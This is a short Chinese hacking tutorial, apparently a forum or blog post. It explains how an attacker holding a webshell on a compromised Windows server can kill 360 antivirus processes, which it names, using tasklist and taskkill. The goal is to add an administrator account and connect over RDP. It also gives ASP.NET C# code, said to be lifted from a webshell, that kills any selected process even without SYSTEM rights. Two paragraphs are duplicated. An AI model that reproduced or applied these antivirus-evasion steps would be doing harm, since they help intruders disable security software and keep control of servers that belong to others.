webshell有system权限,无法添加administrators用户,最后无法成功连接3389,这一般都是杀毒软件引起了,说下突破360的方法
先查看进程:tasklist
然后杀掉进程:taskkill /im 进程名.exe /f
这些是360的进程:360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe
然后关掉360的主动防御,方法:
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):
protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write(“<script>alert(‘Killed’);location.href=’?'</” + “script>”);
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}
asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。
|